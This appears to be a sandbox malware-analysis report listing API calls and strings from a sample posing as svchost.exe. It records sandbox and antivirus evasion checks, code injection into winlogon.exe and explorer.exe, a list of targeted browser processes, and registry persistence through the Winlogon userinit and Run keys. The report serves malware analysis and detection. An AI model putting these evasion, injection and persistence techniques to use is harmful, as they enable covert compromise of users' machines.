Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
Part of subcall function 00403920: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C

ExitProcess.KERNEL32 ref: 00402BAB
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
GetTickCount.KERNEL32 ref: 00402BCE
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
IsUserAnAdmin.SHELL32 ref: 00402C00
ExitProcess.KERNEL32 ref: 00402C11

Strings

user32.dll, xrefs: 00402B81
Pnv, xrefs: 00402D2D, 00402D8F
IsWow64Process, xrefs: 00402C31
explorer.exe, xrefs: 00402D3E, 00402D43, 00402DA0, 00402DA5
Tue Aug 2 12:53:17 20112, xrefs: 00402CCB, 00402CDF, 00402D02, 00402D12, 00402D64, 00402D74
winlogon.exe, xrefs: 00402D37, 00402D99
____AVP.Root, xrefs: 00402BBD
\apppatch\, xrefs: 00402C5A, 00402CAA
kernel32.dll, xrefs: 00402C19

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 9317432-1956477594
Opcode ID: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
Opcode Fuzzy Hash: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

Function 00403920 Relevance: 42.1, APIs: 15, Strings: 9, Instructions: 128
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
strstr.MSVCRT ref: 00403967

Part of subcall function 00403870: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
Part of subcall function 00403870: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
Part of subcall function 00403870: RegCloseKey.KERNEL32(y9@), ref: 004038CF

GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
CharUpperA.USER32(?), ref: 00403999
strstr.MSVCRT ref: 004039AB
strstr.MSVCRT ref: 004039C4
strstr.MSVCRT ref: 004039DD
strstr.MSVCRT ref: 004039F6
strstr.MSVCRT ref: 00403A0F
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE

Strings

test user, xrefs: 004039F0
\sand-box\, xrefs: 00403A8E
\cwsandbox\, xrefs: 00403AA0
VIRUSCLONE, xrefs: 004039D7
SANDBOX, xrefs: 004039A5
MALNETVM, xrefs: 004039BE
test_item.exe, xrefs: 00403961
Dave, xrefs: 00403A09
\sandbox\, xrefs: 00403AB2

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
API String ID: 3012634381-649399103
Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

Function 02D37430 Relevance: 40.8, APIs: 27, Instructions: 286
memorytimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D37300: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D37314
Part of subcall function 02D37300: Process32First.KERNEL32(00000000,?), ref: 02D37339
Part of subcall function 02D37300: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D3735D
Part of subcall function 02D37300: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D37377
Part of subcall function 02D37300: EnterCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D3739B
Part of subcall function 02D37300: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D373A1
Part of subcall function 02D37300: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D373A8
Part of subcall function 02D37300: LeaveCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D373D7
Part of subcall function 02D37300: Process32Next.KERNEL32(00000000,00000128), ref: 02D373EB
Part of subcall function 02D37300: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D37405
Part of subcall function 02D37300: FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02D37416

OpenProcess.KERNEL32(00000400,00000000,00001B0C), ref: 02D37494
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D374B8
GetHandleInformation.KERNEL32(00000000,?), ref: 02D374E2
CloseHandle.KERNEL32(00000000), ref: 02D374F4
EnterCriticalSection.KERNEL32(02D6FB80), ref: 02D374FF
LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D37524
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02D3758B
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D375AC
GetHandleInformation.KERNEL32(00000000,?), ref: 02D375D0
CloseHandle.KERNEL32(00000000), ref: 02D375E2
EnterCriticalSection.KERNEL32(02D6FB80), ref: 02D375ED
LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D37618
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D37666
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D376B1
EnterCriticalSection.KERNEL32(02D6FB80,?,?), ref: 02D376F0
GetProcessHeap.KERNEL32(00000008,00000010), ref: 02D376FA
HeapAlloc.KERNEL32(00000000), ref: 02D37701
Sleep.KERNEL32(00000032), ref: 02D37815

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateChangeCreateCurrentFindFirstNextNotificationSleepSnapshotToolhelp32
String ID:
API String ID: 2706041919-0
Opcode ID: b9e17f469b8ab3c429af16e4a184535781bc4e38308da94a80660054cba99486
Instruction ID: 932235bdf36cde9bdfb207520b57e88204768481fe5bec75975070fd9df042e6
Opcode Fuzzy Hash: b9e17f469b8ab3c429af16e4a184535781bc4e38308da94a80660054cba99486
Instruction Fuzzy Hash: 0FC1F5B1A087419FE321CF65D488A6AFBE9BB88B54F54881EF59987300D770D844CFA2

Function 00401B70 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215
injectionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
Part of subcall function 00401FB0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039

Sleep.KERNEL32(00000064,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
memcpy.MSVCRT ref: 00401CD8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401D01
WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
CloseHandle.KERNEL32(00000000), ref: 00401D7F
RtlCreateUserThread.NTDLL ref: 00401DA0
GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
CloseHandle.KERNEL32(00000000), ref: 00401DCD

Strings

IsWow64Process, xrefs: 00401BEB, 00401C22
kernel32.dll, xrefs: 00401BCF, 00401C0C

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 2373081918-3024904723
Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8

Function 02D448D0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211
injectionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D452D0: memset.MSVCRT ref: 02D452F6
Part of subcall function 02D452D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45307
Part of subcall function 02D452D0: GetLastError.KERNEL32 ref: 02D45310
Part of subcall function 02D452D0: SwitchToThread.KERNEL32 ref: 02D4531F
Part of subcall function 02D452D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45328
Part of subcall function 02D452D0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D45348
Part of subcall function 02D452D0: CloseHandle.KERNEL32(00000000), ref: 02D45359

Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02D4490F
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02D4492E
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D4494D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D44963
GetCurrentProcess.KERNEL32(00000000), ref: 02D4496F
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D4498A
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D4499A
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02D449D4
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02D449F5
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02D44A21
memcpy.MSVCRT ref: 02D44A39
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02D44A54
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02D44A62
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02D44A8A
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D44A9C
GetHandleInformation.KERNEL32(00000000,?), ref: 02D44AB4
CloseHandle.KERNEL32(00000000), ref: 02D44AC5
RtlCreateUserThread.NTDLL ref: 02D44AE6
GetHandleInformation.KERNEL32(00000000,?), ref: 02D44B02
CloseHandle.KERNEL32(00000000), ref: 02D44B13

Strings

kernel32.dll, xrefs: 02D44941, 02D4497E
IsWow64Process, xrefs: 02D4495D, 02D44994

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 2650560580-3024904723
Opcode ID: 9b4373b6ce5fd09f37f3e1d303ed7f1c1bbe4370224a2c8783d43f51bf31c697
Instruction ID: 7a68a73cc74ea4d740b3ab5ac5a2b033ab3018822c07c640422df3527ef6b043
Opcode Fuzzy Hash: 9b4373b6ce5fd09f37f3e1d303ed7f1c1bbe4370224a2c8783d43f51bf31c697
Instruction Fuzzy Hash: A5618D75A40304ABEB10CF64EC89FAA77A8EF45748F548419F905AB380DBB4DD90CBA4

Function 02D34AF0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON

Download Yara Rule

APIs

IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
IsUserAnAdmin.SHELL32 ref: 02D34B11
DnsFlushResolverCache.DNSAPI ref: 02D34B1B
memset.MSVCRT ref: 02D34B38
lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
memset.MSVCRT ref: 02D34B9C
lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5

Strings

http://, xrefs: 02D34B4B, 02D34BA9
www.microsoft.com, xrefs: 02D34BBC
www.bing.com, xrefs: 02D34B64

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
String ID: http://$www.bing.com$www.microsoft.com
API String ID: 1656757314-3977723178
Opcode ID: 5b05dc2a302ce5eb930863805c82116989acbbd5b63fe6c0f2c6db19e44ffb10
Instruction ID: 534ee07b9b007a12563bffcbfe2488b849bcfc34db0dc74bbf17b7360a7cf9a7
Opcode Fuzzy Hash: 5b05dc2a302ce5eb930863805c82116989acbbd5b63fe6c0f2c6db19e44ffb10
Instruction Fuzzy Hash: 3F212D75E4431867D720D6A4FC45FDA776CDB54710F400585F688E6280DAF09EC48BA1

Function 02D22CE0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D22DBF
exit.MSVCRT ref: 02D22DD1
calloc.MSVCRT ref: 02D22DDA
exit.MSVCRT ref: 02D22DEC
calloc.MSVCRT ref: 02D22DF5
exit.MSVCRT ref: 02D22E07
calloc.MSVCRT ref: 02D22E10
exit.MSVCRT ref: 02D22E22
calloc.MSVCRT ref: 02D22E66
free.MSVCRT(00000000,00000000,?,?,00000000,00000000), ref: 02D230EF
free.MSVCRT(00000000), ref: 02D23113
free.MSVCRT(?), ref: 02D23134
free.MSVCRT(?), ref: 02D23155
free.MSVCRT(?), ref: 02D23193

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: callocfree$exit
String ID:
API String ID: 337157181-0
Opcode ID: 799d6e4666470e8fe3b18974225c12ff28ef07c62a9c2aabdb1c5277d4080d0c
Instruction ID: 8ffaedf09d410e9be475f4c6d79f9de88be667524b10e2b184194bccc92afeb2
Opcode Fuzzy Hash: 799d6e4666470e8fe3b18974225c12ff28ef07c62a9c2aabdb1c5277d4080d0c
Instruction Fuzzy Hash: 6FF1CF71A002299BDB20CF98D888BAEB7B5FF98318F544169FD05A7340D775ED49CBA0

Function 02D37300 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D37314
Process32First.KERNEL32(00000000,?), ref: 02D37339
GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D3735D
StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D37377
EnterCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D3739B
GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D373A1
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D373A8
LeaveCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D373D7

Part of subcall function 02D44450: OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
Part of subcall function 02D44450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
Part of subcall function 02D44450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
Part of subcall function 02D44450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
Part of subcall function 02D44450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
Part of subcall function 02D44450: FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
Part of subcall function 02D44450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
Part of subcall function 02D44450: CloseHandle.KERNEL32(00000000), ref: 02D4453F

Process32Next.KERNEL32(00000000,00000128), ref: 02D373EB
GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D37405
FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02D37416

Strings

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02D37372

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleInformationProcess$Close$ChangeCriticalFindHeapNotificationOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
API String ID: 280466567-4199822264
Opcode ID: b5485b1a9216bcf0dcb5c706ae03bfd4289703671fcb2721780cd8e7a77f01fa
Instruction ID: e186e40e0a3d21f2159a37e38dd79773808009880b5cd7f13332a848c7c4a0e6
Opcode Fuzzy Hash: b5485b1a9216bcf0dcb5c706ae03bfd4289703671fcb2721780cd8e7a77f01fa
Instruction Fuzzy Hash: DA31CF71D41215AFEB209F65E84CBAEBBF8EF08714F544498E889D2340DB709E90CBA0

Function 00403870 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
RegCloseKey.KERNEL32(y9@), ref: 004038CF
RegCloseKey.ADVAPI32(y9@), ref: 004038DF

Strings

HARDWARE\DESCRIPTION\System, xrefs: 00403884
Q, xrefs: 004038E5
M, xrefs: 004038F7
SystemBiosVersion, xrefs: 004038B7
U, xrefs: 00403900
y9@, xrefs: 00403879, 004038DB, 004038CB, 0040387C, 004038CE, 004038DE
E, xrefs: 004038EE

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue
String ID: E$HARDWARE\DESCRIPTION\System$M$Q$SystemBiosVersion$U$y9@
API String ID: 1607946009-2685269968
Opcode ID: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction ID: a73e17f2ece4285d148bbbe7d21167b22b4148350c2fc20c0d473cf4689022c2
Opcode Fuzzy Hash: d1a36d96073f5a746890f6a5e71d9fcf43d2de7dda4d0654719f46e6941f7b17
Instruction Fuzzy Hash: 951165F2E00208FAEB20DF90DC45BAA7BB89B45315F1081EAE708751C1D7B86A448F5D

Function 024C1360 Relevance: 4.7, APIs: 3, Instructions: 233librarymemoryloaderCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 024C1435
LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 024C14F5
GetProcAddress.KERNEL32(00000000,00000000,00000000,180E1688), ref: 024C154C

Memory Dump Source

Source File: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24c0000_svchost.jbxd

Yara matches

Similarity

API ID: AddressAllocLibraryLoadProcVirtual
String ID:
API String ID: 4074058790-0
Opcode ID: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
Instruction ID: a800f2c9ce06ee7861ecbb4b2169b928d30c925b24ea988e5a7c6f33630b0dc8
Opcode Fuzzy Hash: aa7ce5a238270ceac95f37866199dfe78f7af4c79aa13279955b4abe68ef9424
Instruction Fuzzy Hash: 44812979D00259AFCB90DBAAC840BAEB7B5AF88354F25445EE80CB7705D734E901CF94

Function 02D37820 Relevance: 63.3, APIs: 32, Strings: 4, Instructions: 276
memoryregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02D3784E
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D37863
HeapAlloc.KERNEL32(00000000), ref: 02D37870
memset.MSVCRT ref: 02D37887
GetShortPathNameA.KERNEL32(C:\Windows\apppatch\svchost.exe,00000000,00000104), ref: 02D3789A
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02D378B5
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D378D3
GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02D378F4
HeapAlloc.KERNEL32(00000000), ref: 02D378FB
memset.MSVCRT ref: 02D3790B
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02D37925
StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02D37931
RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D379D0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D379E2
HeapValidate.KERNEL32(00000000), ref: 02D379E5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D379F2
HeapFree.KERNEL32(00000000), ref: 02D379F5
RegFlushKey.ADVAPI32(?), ref: 02D379FF
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02D37A20
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02D37A49
RegFlushKey.ADVAPI32(?), ref: 02D37A53
RegCloseKey.KERNEL32(?), ref: 02D37A5D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D37A6C
HeapValidate.KERNEL32(00000000), ref: 02D37A6F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D37A7C
HeapFree.KERNEL32(00000000), ref: 02D37A7F
IsUserAnAdmin.SHELL32 ref: 02D37A85
RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02D37ABB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D37ACA
RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02D37AE7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D37AF3
RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02D37B16

Strings

C:\Windows\apppatch\svchost.exe, xrefs: 02D37826, 02D37849, 02D37895, 02D3792B, 02D37B01
userinit, xrefs: 02D378CD, 02D3791F, 02D379CA, 02D37A43
software\microsoft\windows\currentversion\run, xrefs: 02D37A16, 02D37AB1
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02D378AB, 02D37A9A

Memory Dump Source

